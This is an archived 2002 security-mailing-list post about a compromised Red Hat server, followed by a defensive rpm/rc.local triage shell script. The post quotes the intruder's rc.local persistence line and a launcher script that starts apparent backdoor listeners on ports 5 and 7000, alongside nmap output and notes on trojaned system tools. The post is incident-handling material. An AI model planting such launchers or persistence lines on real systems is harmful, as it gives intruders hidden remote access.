hpd, afb, sc, and sn

From: Gordon Chamberlin (glac@visualize.com)
Date: 12/20/02

    From: Gordon Chamberlin <glac@visualize.com>
    To: incidents@securityfocus.com
    Date: 20 Dec 2002 14:11:31 -0700

    I found suspicious looking files on a Redhat 7.1 Linux server earlier
    today. Can anyone confirm or deny that the machine has been hacked?

    The files:
    /usr/bin/hpd
    /usr/bin/afb
    /usr/bin/sn

    The following line is in /etc/rc.local:
    /usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null

    The contents of hpd are:
    #!/bin/sh
    /usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
    /usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null

    nmap reports the following ports open:
    Port State Service
    5/tcp open rje
    22/tcp open ssh
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    111/tcp open sunrpc
    443/tcp open https
    808/tcp open unknown
    1024/tcp open kdm
    3306/tcp open mysql
    7000/tcp open afs3-fileserver
    8009/tcp open ajp13

    According to an rpm -V, all kinds of binaries have been changed: ps,
    top, netstat, ifconfig, ...

    I copied a good version of ps in and found the two afb processes
    running.

    Anyone know about this hack, what afb does and/or how they usually get
    in?

    Embarrassedly,
     -Gordon

    -- 
      Gordon Chamberlin             Software Architect
      Visualize, Inc.               http://www.visualize.com
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
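A defender's triage helper for the kind of check Gordon describes (rpm -V flagging changed binaries, an odd launcher line in rc.local), added here as an example; it is not part of the original post. It parses text in `rpm -Va` output format and rc.local content; the sample data below is constructed from the paths named in the post, and the attribute/flag layout assumed is the standard rpm verify format (`S` size, `5` checksum, `c` config file).

```shell
#!/bin/sh
# Constructed sample in "rpm -Va" format, modelled on the post's findings.
SAMPLE_RPM_V='S.5....T    /bin/ps
S.5....T    /usr/bin/top
S.5....T    /bin/netstat
S.5....T    /sbin/ifconfig
.......T    /usr/bin/gcc
S.5....T  c /etc/rc.d/rc.local
missing     /usr/share/doc/foo/README
.M......    /usr/bin/passwd'

# Constructed rc.local, including the launcher line quoted in the post.
SAMPLE_RC_LOCAL='#!/bin/sh
touch /var/lock/subsys/local
/usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null'

# Print non-config files whose size (S) or checksum (5) differs from the
# package database; these are the candidates for trojaned binaries.
# $1: rpm -Va output text (one entry per line). Run as: rpm_v_modified_bins "$(rpm -Va)"
rpm_v_modified_bins() {
    printf '%s\n' "$1" | awk '
        $1 == "missing" { next }             # absent files are a separate concern
        NF == 3 && $2 == "c" { next }        # config files legitimately change
        $1 ~ /S/ || $1 ~ /5/ { print $NF }   # size or checksum mismatch
    '
}

# Print the program started by each non-comment rc.local line, collapsing
# "/./" so that /usr/bin/./hdp is reported as /usr/bin/hdp. Each path can then
# be checked with "rpm -qf PATH"; an unowned path in a startup script is a red flag.
# $1: rc.local content.
rc_local_launchers() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }    # skip comments and blank lines
        { p = $1; gsub(/\/\.\//, "/", p); print p }
    '
}

echo "== modified package binaries =="
rpm_v_modified_bins "$SAMPLE_RPM_V"
echo "== programs launched from rc.local =="
rc_local_launchers "$SAMPLE_RC_LOCAL"
```

On the affected host, run the two checks with a known-good copy of the tools (mounted from trusted media), since the post itself notes that ps, netstat and friends were replaced.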